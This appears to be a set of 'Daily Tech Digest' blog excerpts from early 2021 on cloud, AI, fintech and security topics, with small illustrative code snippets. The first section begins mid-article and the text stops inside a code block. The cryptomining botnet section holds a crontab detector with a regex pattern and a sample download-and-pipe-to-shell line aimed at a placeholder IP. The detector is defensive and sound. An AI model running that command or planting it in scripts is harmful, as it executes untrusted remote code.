Over the course of the last year or so, the team started working on what it calls Canvas Kit. This WebAssembly-based project takes the same Skia graphics engine that powers Android and Chrome itself and makes it available to web apps. “What that’s meant is that we can now essentially bypass the core HTML — sort of the document-centric parts of the web platform — and really use the app-centric parts of the web platform without leaving [behind] things like auto-complete of text or passwords and all the things that keep the web feeling very unique,” Sneath said. On the desktop, Google is announcing that Canonical is going all-in on Flutter and making it the default choice of all its future desktop and mobile apps. Microsoft, too, is expanding its support for Flutter and working with Google on Windows support for Flutter. Given Microsoft’s interest in Android, that’s maybe no huge surprise, and indeed, Microsoft today is releasing contributions to the Flutter engine to help support foldable Android devices. In total, Google notes, there are now over 15,000 packages for Flutter and Dart from companies like Amazon, Microsoft, Adobe, Huawei, Alibaba, eBay and Square.


Data Science Environments

Environment managers are critical to the concept of virtual machines. A virtual machine (VM) can be thought of as a computer inside of your computer (Inception style). As with everything mentioned here, a virtual machine is simply a method of file management. The VM is a program that isolates itself from all the other files on the computer; it may even run a different operating system. (For example, a macOS computer might have a virtual machine running a Windows operating system.) Virtual machines are very effective when you want to recreate a programming environment on another computer, because you don’t need to know anything about that computer’s current dependencies. You can set up a virtual machine that exposes exactly the same files as the virtual machine on your own computer. For this reason, data science heavily utilizes virtual machines; they ensure reproducibility of results. Cloud-based applications are another common example of VMs. The developer counts on the fact that their VM will be isolated from any other code living on the server hosting their application.
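The same isolation idea shows up in lighter-weight form in language-level environment managers. As a sketch (the directory name `demo-env` is arbitrary), Python's standard-library `venv` module creates an environment whose interpreter and installed packages are separate from the host's, which is the mechanism behind per-project reproducibility:

```python
import venv
from pathlib import Path

# Build an isolated environment: its site-packages directory is separate
# from the host interpreter's, so each project can pin its own dependencies.
env_dir = Path("demo-env")
builder = venv.EnvBuilder(with_pip=False, clear=True)
builder.create(env_dir)

# The environment records which base interpreter it was created from
# in its pyvenv.cfg configuration file.
cfg = (env_dir / "pyvenv.cfg").read_text()
print("home =" in cfg)  # True
```

Activating the environment (via its `bin/activate` or `Scripts\activate` script) then makes the isolated interpreter the default for that shell session.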


8 mobile security threats you should take seriously

A mobile device is only as secure as the network through which it transmits data. In an era where we're all constantly connecting to networks that might not be optimally secured — be they the improperly configured home networks of remote workers or public WiFi networks — our information frequently isn't as protected as we might assume. Just how significant a concern is this? According to research by Wandera, in a more typical year, corporate mobile devices use WiFi almost three times as much as they use cellular data. Nearly a quarter of devices connect to open and potentially insecure WiFi networks, and 4% of devices encounter a man-in-the-middle attack — in which someone maliciously intercepts communication between two parties — within an average month. Those numbers have dipped this past year due to reduced travel and fewer physical businesses being open during COVID, but that doesn't mean the threat is gone — or that there's no need to remain ahead of the game, even with employees working mostly from home. "Rather than relying on man-in-the-middle attack detection to be reactive, we recommend organizations take a more proactive approach to securing remote connections," says Michael Covington.


Risky business: 3 timeless approaches to reduce security risk in 2021

Some organizations see migrating to the cloud as a way of creating greenfield environments that can be secured more easily than the tech-debt-laden on-premises network. Yes, cloud adoption does have many security benefits. And, yes, the cloud does represent an opportunity to do things over better, with a greenfield architecture that has best practices baked neatly into it. But many organizations’ lack of cloud security processes and controls can quickly eat away at the cloud’s forecasted risk reduction benefits, reducing the overall value of this opportunity. You should keep in mind that AWS S3 buckets are left unsecured and publicly available all the time. Developers have been known to leave (or hardcode) private keys and tokens in the most embarrassing places. Personnel leave files unsecured and open to the public far too often. Publicly available endpoints are improperly segmented from private networks, sometimes creating an autobahn towards the on-premises network. Many organizations don’t do a good enough job of monitoring activity in the cloud or the information flow between the cloud and the on-premises network.
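A minimal sketch of the kind of automated check that catches the unsecured-bucket problem described above. The policy document is hypothetical, and a real audit would rely on the cloud provider's own tooling rather than this simplified parser; the sketch only shows the shape of the check:

```python
import json

def is_publicly_readable(policy_json: str) -> bool:
    """Flag a bucket policy that allows object reads by any principal ('*')."""
    policy = json.loads(policy_json)
    for stmt in policy.get("Statement", []):
        principal = stmt.get("Principal")
        public = principal == "*" or (
            isinstance(principal, dict) and principal.get("AWS") == "*"
        )
        if stmt.get("Effect") == "Allow" and public \
                and "s3:GetObject" in stmt.get("Action", []):
            return True
    return False

# Hypothetical policy of the kind that keeps showing up in breach reports.
risky = json.dumps({"Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": ["s3:GetObject"],
    "Resource": "arn:aws:s3:::demo-bucket/*",
}]})
print(is_publicly_readable(risky))  # True
```

Running a check like this continuously, rather than once at migration time, is exactly the kind of cloud monitoring the excerpt says many organizations skip.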



Quote for the day:

"It is easy to lead from the front when there are no obstacles before you, the true colors of a leader are exposed when placed under fire." -- Mark W. Boyer

Daily Tech Digest - March 04, 2021

Proptech disruption trends: innovation in the real estate space

Users have found that RPA can learn how to complete administrative tasks, leaving more time to spend on duties that require a more human touch, such as customer service. Tom Reiss, CEO of Roby AI, explained: “By learning how a user carries out a task, RPA can then be custom built and combined with tasks which require an element of human touch. This approach means that companies can become hugely efficient, and staff are no longer weighed down with laborious tasks. “Whilst some companies have traditionally feared proptech, this kind of clever technology can be implemented easily alongside existing structures. In turn, creating minimal disruption to the business and maximum output when it comes to efficiency, cost saving and employee satisfaction.” ... “Video surveillance can be performed in real time, or data can be collected and stored for the purpose of evaluation when required.” Lodhia went on to explain how the cloud has further facilitated safety measures, which have benefitted from remote monitoring and management, particularly during the Covid-19 pandemic. “The impact of cloud technology has had a dramatic impact on proptech, and there are two main benefits,” Lodhia said.


How the Digital Twin Drives Smart Manufacturing

One of the initial areas of focus for implementation of the digital twin has been asset lifecycle management (ALM). Maintaining assets in the field has traditionally been a time-consuming and costly task, but critical to equipment and system uptime. Today, maintenance technicians can leverage technologies like augmented reality (AR) that allows them to access virtual engineering models and overlay these models over the physical equipment on which they are performing maintenance using specialized AR goggles or glasses. This enables them to use the most accurate and up-to-date engineering, helping ensure that the correct maintenance and performance specifications are performed efficiently. These same maintenance methods, based on merging of virtual and physical environments, can be applied to factory production systems, machines, and work cells. In addition, products, production systems, machines, and work cells can be simulated virtually to test and validate physical systems prior to assembly and installation. Moreover, the virtual commissioning of production automation—an established technology and process—is merging with the more expansive scope of the digital twin.


What's between your clouds? That's key to multi-cloud performance

First, you need management and monitoring layers. These include AIOps, security managers, governance tooling, and other technologies that can manage and control heterogeneous cloud deployments. The management and monitoring layers are just as important as—perhaps even more important than—the native services that run on those public clouds. These layers of software systems become the jumping-off point for modern cloud operations, and they can operate without leveraging cloud-specific systems as you move forward. Second, public cloud providers are beginning to invest in cross-cloud solutions. Most won't mention the word multi-cloud, but they plan to support this architecture, nonetheless. This puts the nail in the coffin of less complex, single-cloud deployments that do not take advantage of best-of-breed. Some people remain skeptical that public cloud providers will build technology that will integrate with the competition, but the providers really have no other choice. Remember when Apple and Microsoft devices could not communicate? Cloud vendors do. This is not a new trend. Enterprises will continue to move to multi-cloud as the preferred cloud deployment platform, and that move is to the middle.


How We’ll Conduct Algorithmic Audits in the New Economy

Lack of transparent accountability for algorithm-driven decision making tends to raise alarms among impacted parties. Many of the most complex algorithms are authored by an ever-changing, seemingly anonymous cavalcade of programmers over many years. Algorithms’ seeming anonymity -- coupled with their daunting size, complexity and obscurity -- presents the human race with a seemingly intractable problem: How can public and private institutions in a democratic society establish procedures for effective oversight of algorithmic decisions? Much as complex bureaucracies tend to shield the instigators of unwise decisions, convoluted algorithms can obscure the specific factors that drove a specific piece of software to operate in a specific way under specific circumstances. In recent years, popular calls for auditing of enterprises’ algorithm-driven business processes have grown. Regulations such as the European Union (EU)’s General Data Protection Regulation may force your hand in this regard. GDPR prohibits any “automated individual decision-making” that “significantly affects” EU citizens. Specifically, GDPR restricts any algorithmic approach that factors a wide range of personal data -- including behavior, location, movements, health, interests, preferences, economic status, and so on -- into automated decisions.


A quantum internet is closer to reality, thanks to this switch

For a quantum internet, forming connections between users and adjusting bandwidth means distributing entanglement, the ability of photons to maintain a fixed quantum mechanical relationship with one another no matter how far apart they may be, in order to connect users in a network. Entanglement plays a key role in quantum computing and quantum information processing. "When people talk about a quantum internet, it's this idea of generating entanglement remotely between two different stations, such as between quantum computers," said Navin Lingaraju, a Purdue Ph.D. student in electrical and computer engineering. "Our method changes the rate at which entangled photons are shared between different users. These entangled photons might be used as a resource to entangle quantum computers or quantum sensors at the two different stations." Purdue researchers performed the study in collaboration with Joseph Lukens, a research scientist at Oak Ridge National Laboratory. The wavelength-selective switch that the team deployed is based on similar technology used for adjusting bandwidth for today's classical communication.


What is a solutions architect? A vital role for IT-business alignment

A solutions architect is responsible for evaluating an organization’s business needs and determining how IT can support those needs leveraging software, hardware, or infrastructure. Aligning IT strategy with business goals has become paramount, and a solutions architect can help determine, develop, and improve technical solutions in support of business goals. A solutions architect also bridges communication between IT and business operations to ensure everyone is aligned in developing and implementing technical solutions for business problems. The process requires regular feedback, adjustments, and problem-solving in order to properly design and implement potential solutions. Solution architecture itself encompasses business, system, information, security, application and technology architecture. Some examples of solutions architecture include developing cloud infrastructure for efficiency, implementing microservices for ecommerce, or adopting security measures for data, systems, and networks. While the scope of the job can vary depending on a business’ specific needs, there are certain responsibilities, skills, and qualifications that solutions architects will need to meet to get the job.


Digital transformation: 5 new realities for CIOs

We’re not just working from home but also attending school, shopping, and conducting all essential communications without ever walking out the front door. Many jobs that we previously thought were only doable from the job site can now be done remotely. Product development teams now have their living rooms and garages full of parts, equipment, etc., harkening back to the early start-up era for companies like Apple, HP, Microsoft, and others. Of course, the more we do from home, the more our finite bandwidth resources are taxed. Traditional peak hours for internet usage were in the evening, but with everyone home 24/7, streaming everything simultaneously, the Wi-Fi is straining to remain stable during an employee’s more ideal work hours. We must equip WFH employees with the technology and bandwidth they need to be productive and efficient. Allocate budget to upgrade employees’ home networks to premium bandwidth. Nothing causes more headaches than choppy bandwidth on Zoom when trying to support clients. ... With the move to the cloud and WFH, we’re now forced to manage a high-threat environment every time an employee fires up a laptop or mobile phone and taps into the company network or cloud resources.


AI in Hydroponics: The Future Of Smart Farming

AI-driven ‘Smart Hydroponics’ can determine optimum growth for a plant through a combination of hardware setup and a software tool that can recreate its growth trajectory. Insights are generated from data obtained by sensors in the hardware. The sensing hardware is divided into three categories, each of which is strategically placed within the hydroponics farm. They sit near the plant roots and collect data about the crop vitals, pH levels, electrical conductivity levels, and nutrient supply. They also detect light density, temperature, and humidity levels. A visual camera also checks the growing plants for colouration and feeds the data to the AI software. On the other hand, insights about the precise nature and needs of the products are generated through machine learning. The AI software system works like the brain behind the entire Hydroponic farm. It can choose between different types of LED lighting and modulate light intensity. It can even turn on a suitable irrigation system. It drives end-to-end automation so that fewer manual tasks are delegated. Currently, AI in Hydroponics in India may be in a fledgling state.
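As a rough illustration of the sensing-to-action loop described above, here is a toy rule-based slice of such a controller. The pH and EC target ranges and the action names are assumptions for the sketch, not values from the article, and a real system would learn these policies rather than hard-code them:

```python
# Assumed healthy ranges for this sketch only.
TARGET_PH = (5.5, 6.5)   # acidity near the roots
TARGET_EC = (1.2, 2.0)   # electrical conductivity in mS/cm (nutrient strength)

def dosing_actions(ph: float, ec: float) -> list:
    """Map root-zone sensor readings to corrective dosing actions."""
    actions = []
    if ph < TARGET_PH[0]:
        actions.append("dose pH-up")
    elif ph > TARGET_PH[1]:
        actions.append("dose pH-down")
    if ec < TARGET_EC[0]:
        actions.append("add nutrient concentrate")
    elif ec > TARGET_EC[1]:
        actions.append("dilute with fresh water")
    return actions or ["hold"]

# Water is too acidic and the nutrient solution too concentrated:
print(dosing_actions(5.2, 2.3))  # ['dose pH-up', 'dilute with fresh water']
```

The ML layer the article describes would sit above a loop like this, tuning the target ranges per crop and growth stage from historical data.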


Fintech disruption trends: a changing payment landscape on the horizon

With such a dramatic shift to digital commerce, largely accelerated by the impact of Covid-19, demand for software-based payment technology will exponentially increase, according to Justin Pike, founder and chairman of MYPINPAD — the software-based payments company. In this digital world the consumer is opened up to a variety of choice that can’t be replicated in the physical world and competition is fierce. “Consequently, consumer facing brands have recognised the criticality of technology that can significantly improve the customer experience,” says Pike. He believes that software-based payment technology forms the missing piece of the puzzle in terms of innovating and improving the customer experience in a remote environment, where the customer experience is completed on mobile devices. “Standardisation of the payment experience through software, across all channels (both online and offline) is where we are rapidly heading. This innovation will bring a myriad of benefits for both consumer and brand, but it absolutely must be built on a foundation of security,” Pike continues. “For merchants, the opportunity to reach new markets and customers is too good to miss.”


Arguing your way to better strategy

Iterative visualization is achieved by creating a strategy map, which tracks a proposed strategy’s causal path backward from its desired outcome to the factors required to make it happen. The authors illustrate this process by producing a strategy map based on statements about Walmart’s low-cost model, which enabled the retailer to attract customers and vanquish competitors in the pre-digital economy. Working backward from the desired outcome of low costs, they map two of its enablers: operational efficiencies and a bargaining advantage over suppliers. In turn, they enumerate the enablers of those enablers, which for bargaining include high-volume purchasing, negotiating prowess, and private labels. And so on. A strategy map is only the first step in making a strategy argument. “At this stage,” Sørensen and Carroll explain, “these statements are just unfounded claims in the strategy argument, and their veracity and importance have yet to be demonstrated.” That work begins in the second set of activities — logical formalization. Logical formalization entails testing the validity and soundness of the premises underlying the statements in a strategy map.
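The backward-tracing process the authors describe can be sketched as a walk over a small causal map. The map below hand-codes the Walmart enablers mentioned in the excerpt; a real strategy map would carry many more claims and, as the authors note, each claim would still need its validity tested:

```python
# Strategy map from the excerpt: each claim maps to its required enablers.
strategy_map = {
    "low costs": ["operational efficiencies",
                  "bargaining advantage over suppliers"],
    "bargaining advantage over suppliers": ["high-volume purchasing",
                                            "negotiating prowess",
                                            "private labels"],
}

def trace_enablers(outcome, depth=0):
    """Walk backward from a desired outcome through its chain of enablers,
    returning (depth, claim) pairs in traversal order."""
    chain = [(depth, outcome)]
    for enabler in strategy_map.get(outcome, []):
        chain.extend(trace_enablers(enabler, depth + 1))
    return chain

chain = trace_enablers("low costs")
for depth, claim in chain:
    print("  " * depth + claim)  # indentation shows the causal path
```

Each printed claim is, in the authors' terms, still an unfounded premise; the map only makes the argument's structure explicit so formalization can test it.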



Quote for the day:

"If you only read the books that everyone else is reading, you can only think what everyone else is thinking." -- Haruki Murakami

Daily Tech Digest - March 02, 2021

Looking For An AI Ethicist? Good Luck

Just like with the hunt for data scientists, the person in charge of driving the AI ethics strategy at a company ideally will have a long list of qualifications. According to Ammanath, who was a Datanami Person to Watch for 2020, an AI ethicist generally should have the following skills and capabilities: An understanding of AI tools and technology; An understanding of the business and the industry and the specific AI ethical traps that exist in them; Good communication skills and the ability to work across organizational boundaries; And regulatory, legal, and policy knowledge. There are additional skills that may be required, such as having experience with the philosophical, psychological, or sociological aspects of ethics; knowing how to structure a business and a team in an ethical manner; and even knowing how to mitigate the environmental impact of using AI. “The point is that you need to have a wide variety of skills,” Ammanath says. “It’s like finding that unicorn… Trying to find that person with credible experience and knowledge in all of these areas is practically impossible.” So where does that leave you? The odds are, unless you’re working at a very large enterprise, you won’t be able to find a person to fit this exact job description.


Building a Next-Generation SOC Starts With Holistic Operations

Today's reimagined SOCs bring together disparate teams to counteract intrusions, providing everyone with a coordinated, holistic, real-time view. This tactic empowers analysts to head things off, "shifting left" in the cyber kill chain to identify the full scope of the attack while it's happening and quickly block it as far upstream as possible (ideally using automated investigation and response). We see this as the only way for SOCs to address new threats in time to avert major business impacts. It's time to empower your SOC with multidomain, central teams. It's more than tools differentiating a reactive SOC from an agile, proactive, successful one. Modernizing security operations requires an operational model that drives cross-technology integration to match the attacker's modus operandi. Empowering your SOC to deploy speedy, effective countermeasures means dangerous attackers will be slowed or deterred, reducing damage to your business and saving valuable time and money. The proper template for a modernized SOC team operates seamlessly across domains with an end-to-end view. Consider your SOC's opposition: Sophisticated bad actors see the entire picture, know where they're going and who they're engaging, and understand how to exploit weaknesses.


Can we explain AI? An Introduction to Explainable Artificial Intelligence

Why do we need to explain AI? This is a question that has no simple answer to it. Suppose you take the example of my project that I mentioned initially. In that case, the controller might want to understand our trust models. It is hard to believe something we do not understand. We have a problem when we cannot explain the decisions made by an algorithm. In assessing AI’s decisions, it is crucial to assess the factors that led to that decision. We will therefore be able to audit and challenge decisions or work to improve the factors. This is where the importance of xAI, or explainable AI, comes in, which addresses the need to be able to interpret a model of Machine Learning. This is because it is typical for the formulation of problems addressed by ML to be incomplete. Often, forecasting is not enough to address a problem. It is essential to know more than just “what,” but also “why,” “how.” It is not enough to know that a teacher has been poorly classified in one year; it is also essential to know the reason for improvement. Although AI is one of the most important and disruptive technologies of the century, it is subject to bias. Good model accuracy can be a trap.
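One simple xAI technique that gets at the "why" behind a prediction is permutation importance: shuffle one input feature across the dataset and measure how much the model's error grows. The sketch below is self-contained and uses a hypothetical "black box" whose output depends only on its first feature; it is an illustration of the idea, not any particular xAI library:

```python
import random

random.seed(0)

# Hypothetical black-box model: only the first feature matters.
def model(x):
    return 5.0 * x[0] + 0.0 * x[1]

data = [(random.uniform(-1, 1), random.uniform(-1, 1)) for _ in range(200)]
targets = [model(x) for x in data]

def mse(preds):
    return sum((p - t) ** 2 for p, t in zip(preds, targets)) / len(targets)

def permutation_importance(feature):
    """Shuffle one feature across the dataset and measure how much the
    model's error grows; unimportant features leave the error unchanged."""
    shuffled = random.sample([x[feature] for x in data], len(data))
    preds = []
    for x, value in zip(data, shuffled):
        row = list(x)
        row[feature] = value
        preds.append(model(row))
    return mse(preds)

# Shuffling feature 0 hurts the model; shuffling feature 1 does not.
print(permutation_importance(0) > permutation_importance(1))  # True
```

Answering "which factor drove this decision" in this mechanical way is exactly the kind of audit-friendly evidence the paragraph argues we need.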


Why IT Should Have a Separate Training Budget

Large IT organizations can fund their own training departments, complete with their own training directors. Often these individuals have experience in both IT and education -- and they do a great job. But in many other cases, there is no formal IT training function -- only an IT training budget. In these cases, the CIO, project managers and other IT leadership must step in. They identify the core skills that they need and the individuals whom they want to send to these trainings -- and what the training will cost. This strategy of collectively evaluating IT staff, with each manager coming forth with his or her staff training needs, works -- but it’s far from flawless. The major downside is that people who are not skilled in education or training might not make the right training choices -- either in courses or in the people they send. ... Hot projects and keeping systems running are IT priorities, not training. So, if there is a hot project, or a major performance issue with an existing system, training is quickly forgotten. The result is that training that was budgeted gets deferred or isn't used at all. This makes for a very tough fight for the CIO when the next budget review comes around. The CFO will undoubtedly challenge the IT training budget, saying that the budget was underused last year so should be re-funded at that lesser level.


Indian Vaccine Makers, Oxford Lab Reportedly Hacked

The Chinese state-backed hacking group APT10, also known as Stone Panda, has in recent weeks targeted the IT systems of two Indian pharmaceutical makers whose coronavirus vaccines are being used in the country's immunization program, the Reuters news service reports, citing a report from Tokyo, Japan-based cybersecurity firm Cyfirma. That company says that hackers identified gaps and vulnerabilities in the IT infrastructure and supply chain software of the pharmaceutical firm Bharat Biotech and the Serum Institute of India, or SII, one of the largest vaccine makers globally, Reuters reports. Cyfirma says the apparent motivation behind the hackers' efforts was an attempt to exfiltrate intellectual property of the pharmaceutical firms, according to Reuters. SII is making the AstraZeneca vaccine for many countries and will soon start bulk-manufacturing Novavax shots, the news service reports. Cyfirma, SII and Bharat Biotech did not immediately respond to Information Security Media Group's requests for comment. ... Meanwhile, last week, Forbes reported that U.K.-based Oxford University's Division of Structural Biology – known as Strubi - had been hacked, with equipment used to prepare biochemical samples targeted.


Rethinking the artificial intelligence race

The way that AI systems are developed naturally creates doubts about their ability to function in untested environments, namely the requirement of large amounts of data inputs, the necessity that they be nearly perfect, and the effects of the preconceived notions of its creators. First, lack of, or erroneous, data is one of the largest challenges, especially when relying on machine learning techniques. To teach a computer to recognize a bird, it must be fed thousands of pictures to “learn” a bird’s distinguishing features, which naturally limits use in fields with few examples. Additionally, if even a tiny portion of the data is incorrect (as little as 3%), the system may develop incorrect assumptions or suffer drastic decreases in performance. Finally, the system may also recreate assumptions and prejudices—racist, sexist, elitist, or otherwise—from extant data that already contains inherent biases, such as resume archives or police records. These could also be coded in as programmers inadvertently impart their own cognitive biases into the machine learning algorithms they design. This propensity for deep-seated decision-making problems, which may only become evident well after development, will prove problematic to those that want to rely heavily on AI, especially concerning issues of national security.


How Leaders Can Help Their Teams Manage Stress in the New Year

Employees need to take vacations to reset and get their minds off of their work, but modern work policies don’t encourage time off the way they should. Plenty of companies offer generous or even unlimited amounts of vacation time, but workers are reticent to indulge lest they fall behind. The easiest solution to this issue is to simply mandate that workers take the time off they need. To combat the high-stress levels endemic to companies in their industry, game developer Supergiant Games instituted a policy stating that workers must take a minimum of 20 days off annually while still allowing for unlimited time away. A similar policy for your workplace will help employees cool off right when they need to the most. ... Your workers will never be able to achieve stress equilibrium if their boss can’t do it first. Being a great business leader isn’t just about telling people what they need to do; it’s about modeling those behaviors yourself. If you’re preaching stress reduction to your team while clocking in 11 hours a day, no one is going to be able to take your messaging seriously. Stress management starts with you, whether you like it or not.


Google Introduces Low Bitrate Speech Codec For Smoother Communication

Lyra is a novel method for compressing and transmitting voice signals. For this, the researchers applied traditional codec techniques and the latest machine learning methods on models trained on vast amounts of data. Lyra extracts features or distinctive speech attributes (list of numbers representing the speech energy in different frequency bands, called log mel spectrograms) from the input every 40ms and compresses before transmitting. At the receiving end, a generative model converts the features to a speech signal. Lyra’s new and improved ‘natural-sounding’ generative models maintain a low bitrate while achieving quality generally on par with state-of-the-art waveform codecs used in streaming platforms. However, one drawback of these generative models is computational complexity. To overcome this, Lyra uses a cheaper variation of WaveRNN, a recurrent generative model. Though it works at a lower rate, it generates multiple parallel signals in different frequencies. These signals are then combined to output a signal at the desired sample rate. Hence, Lyra works on cloud servers and mid-range phones with a processing latency of 90ms.
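As a rough illustration of the 40ms feature cadence, the sketch below frames a signal into 40ms windows. The 16kHz sample rate and the non-overlapping frames are assumptions made for the example, and the actual log mel spectrogram computation is omitted:

```python
SAMPLE_RATE = 16_000                          # assumed sample rate (Hz)
FRAME_MS = 40                                 # features extracted every 40 ms
FRAME_LEN = SAMPLE_RATE * FRAME_MS // 1000    # 640 samples per frame

def frame_signal(samples):
    """Split a signal into non-overlapping 40 ms frames, dropping any
    partial frame at the tail."""
    return [samples[i:i + FRAME_LEN]
            for i in range(0, len(samples) - FRAME_LEN + 1, FRAME_LEN)]

one_second = [0.0] * SAMPLE_RATE              # silent placeholder signal
frames = frame_signal(one_second)
print(len(frames), len(frames[0]))            # 25 640
```

In the codec, each such frame would be reduced to a short feature vector before compression, which is what keeps the transmitted bitrate low.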


Cryptomining Botnet Uses Bitcoin Wallet to Avoid Detection

The initial infection starts with the exploitation of remote code execution vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP (CVE-2019-9082). The payload delivered causes the vulnerable machine to download and execute a malicious shell script. "In older campaigns, the shell script itself handled the key functions of infection. The stand-alone script disabled security features, killed off competing infections, established persistence, and in some cases, continued infection attempts across networks found within the known host files," the report notes. But the newer instances of the shell script are written with fewer lines of code and use binary payloads for handling more system interactions, such as killing off competition, disabling security features, modifying SSH keys, downloading malware and starting the miners. Researchers note that the operators behind the campaign use cron jobs and rootkits for persistence and updates to distribution, ensuring infected machines will regularly check in and be reinfected with the latest version of the malware. These methods rely on domains and static IP addresses written into crontabs and configurations, and these domains and IP addresses routinely get identified and seized, the researchers say.
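Defensively, the crontab-based persistence described here tends to leave a recognizable fingerprint: a scheduled job that fetches a remote script and pipes it straight into a shell. Below is a minimal, hypothetical detector for that pattern; the crontab lines and IP address are invented for the sketch, and real incident response would inspect far more than crontabs:

```python
import re

# Download-and-execute pattern: curl/wget output piped directly into sh/bash.
SUSPICIOUS = re.compile(r"(curl|wget)[^|;]*\|\s*(ba)?sh")

def flag_crontab_lines(crontab: str) -> list:
    """Return crontab lines that fetch and execute remote code."""
    return [line for line in crontab.splitlines() if SUSPICIOUS.search(line)]

sample = """\
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://203.0.113.7/update.sh | sh
"""
hits = flag_crontab_lines(sample)
print(len(hits))  # 1: only the download-and-execute job is flagged
```

Because the report notes the operators hard-code domains and static IPs into crontabs, scanning scheduled jobs for these patterns is one practical way to spot reinfection hooks.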


Saga Orchestration for Microservices Using the Outbox Pattern

There are two general ways of implementing distributed Sagas—choreography and orchestration. In the choreography approach, one participating service sends a message to the next after it has executed its local transaction. With orchestration, on the other hand, there’s one coordinating service that invokes one participant after the other. Both approaches have their pros and cons. Personally, I prefer the orchestration approach, as it defines one central place that can be queried to obtain the current status of a particular Saga (the orchestrator, or “Saga execution coordinator,” SEC for short). Since it avoids point-to-point communication between participants, (other than the orchestrator), it also allows for the addition of further intermediary steps within the flow, without the need to adjust each participant. Before diving into the implementation of such Saga flow, it’s worth spending some time to think about the transactional semantics that Sagas provide. ... From a service consumer point of view—e.g., a user placing a purchase order with the order service—the system is eventually consistent; i.e., it will take some time until the purchase order is in its correct state, as per the logic of the different participating services.
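The orchestration approach can be sketched as a coordinator that runs each step's local transaction in order and, on failure, applies the compensations of completed steps in reverse. The order-flow step names below are hypothetical, and a real Saga execution coordinator would persist its log (e.g. via the outbox pattern) rather than keep it in memory:

```python
class SagaOrchestrator:
    """Minimal Saga execution coordinator (SEC) sketch."""

    def __init__(self):
        self.steps = []   # (name, action, compensation) triples
        self.log = []     # central record of the Saga's current status

    def add_step(self, name, action, compensation):
        self.steps.append((name, action, compensation))

    def execute(self) -> bool:
        completed = []
        for name, action, compensation in self.steps:
            try:
                action()
            except Exception:
                # Roll back: compensate completed steps in reverse order.
                self.log.append(f"{name}: failed")
                for done_name, comp in reversed(completed):
                    comp()
                    self.log.append(f"{done_name}: compensated")
                return False
            self.log.append(f"{name}: done")
            completed.append((name, compensation))
        return True

# Hypothetical order flow: payment succeeds, stock reservation fails.
def ok():
    pass

def out_of_stock():
    raise RuntimeError("no stock")

saga = SagaOrchestrator()
saga.add_step("charge-payment", ok, ok)    # compensation would refund
saga.add_step("reserve-stock", out_of_stock, ok)
result = saga.execute()
print(result, saga.log)
```

The in-memory `log` is what makes orchestration attractive: it is the single place a consumer can query to see that the purchase order is, for now, only eventually consistent.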



Quote for the day:

"In any leadership position, the most important aspect of your job will be getting your team to work together." -- Dale Brown

Daily Tech Digest - February 19, 2021

Data lake storage: Cloud vs on-premise data lakes

The data lake is conceived of as the first place an organisation’s data flows to. It is the repository for all data collected from the organisation’s operations, where it will reside in a more or less raw format. Perhaps there will be some metadata tagging to facilitate searches of data elements, but it is intended that access to data in the data lake will be by specialists such as data scientists and those that develop touchpoints downstream of the lake. Downstream is appropriate because the data lake is seen, like a real lake, as something into which all data sources flow, and they are potentially many, varied and unprocessed. From the lake, data would go downstream to the data warehouse, which is taken to imply something more processed, packaged and ready for consumption. While the data lake contains multiple stores of data, in formats not easily accessible or readable by the vast majority of employees – unstructured, semi-structured and structured – the data warehouse is made up of structured data in databases to which applications and employees are afforded access. A data mart or hub may allow for data that is even more easily consumed by departments. So, a data lake holds large quantities of data in its original form. Unlike queries to the data warehouse or mart, interrogating the data lake requires a schema-on-read approach.
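The schema-on-read idea can be illustrated with a short sketch: raw, heterogeneous records stay in the lake unchanged, and a structure is imposed only at the moment the data is read. This is a minimal, self-contained Python illustration; the field names and records are invented for the example.

```python
import json

# Schema-on-read sketch: the "lake" holds raw JSON lines of varying
# shape, plus unprocessed noise. No schema is enforced on write; a
# projection onto (user, amount) is applied only at read time.

RAW_LAKE = [
    '{"user": "a1", "amount": "19.99", "ts": "2021-02-19"}',
    '{"user": "b2", "amount": 5, "extra_field": true}',   # different shape
    'not valid json at all',                              # unprocessed noise
]

def read_with_schema(raw_records):
    """Project each raw record onto (user, amount) at read time,
    coercing types and skipping records that do not fit the schema."""
    for line in raw_records:
        try:
            rec = json.loads(line)
            yield {"user": str(rec["user"]), "amount": float(rec["amount"])}
        except (ValueError, KeyError, TypeError):
            continue  # malformed records stay in the lake, absent from this view

rows = list(read_with_schema(RAW_LAKE))
```

Contrast this with a warehouse, where the same coercion and cleaning would have happened once, on write, before any consumer ever queried the data.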


Microsoft Azure Front Door Gets a Security Upgrade

Johnson uses three principles to describe zero trust, the first of which involves adopting explicit verification for every transaction during a session: "So not just verifying the human, but the device, the data, the location, if it's an IoT device, the application – everything that happens in the session should be verified and anomalous behavior should be flagged," she explains. The second principle is ensuring least privilege access. Many organizations still provide too much privileged access to employees, Johnson says. One of the steps Microsoft is taking with its content and application delivery is implementing more controls around access. The third principle: "Then, finally, assume you've been breached," she says. Assumed breach is a topic the security industry has discussed for years, but with zero trust, they have to assume they have been breached, and that anything within the organization could potentially be breached. These principles have grown essential as application-delivery networks undergo a massive transformation to the cloud, Johnson explains. The new capabilities in Azure Front Door aim to provide organizations with one platform that meets availability, scalability, and security needs.


Tools And Models Used In Software Testing

Software testing is a significant part of software quality assurance (SQA): it is an activity used for evaluating and improving software quality. It involves a set of activities carried out with the sole aim of finding errors in software. It validates and verifies that the software or product is functioning correctly, without errors or bugs capable of causing defects. In the testing phase, the errors from previous cycles must be detected; this ensures complete software reliability and quality assurance. As software functionality grows, it is essential to use innovative testing models and tools to ensure that the time and cost spent on testing are kept to a minimum. When it comes to testing the functionality of software, there are two types: manual and automated. Manual testing is carried out by a tester; informal review, inspection, walkthrough, and technical review are its main techniques. Manual testing is time-consuming and requires more effort, which is the major drawback of this kind of testing. Test automation helps to resolve and control these issues. Automated testing can be categorized into four types: performance testing, safety testing, accuracy testing, and reliability testing. Using automation tools, the steps involved in manual testing are automated.
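As a small illustration of the manual-versus-automated distinction, the kind of repetitive functional check a manual tester would perform by hand can be captured as a repeatable automated test, here using Python’s built-in unittest module. `apply_discount` is a made-up function for the sake of the example.

```python
import unittest

# A minimal test-automation sketch: once written, these checks run
# identically on every build, removing the time and effort of
# re-executing them manually each cycle.

def apply_discount(price, percent):
    """Hypothetical function under test: apply a percentage discount."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)

class TestApplyDiscount(unittest.TestCase):
    def test_typical_discount(self):
        self.assertEqual(apply_discount(200.0, 25), 150.0)

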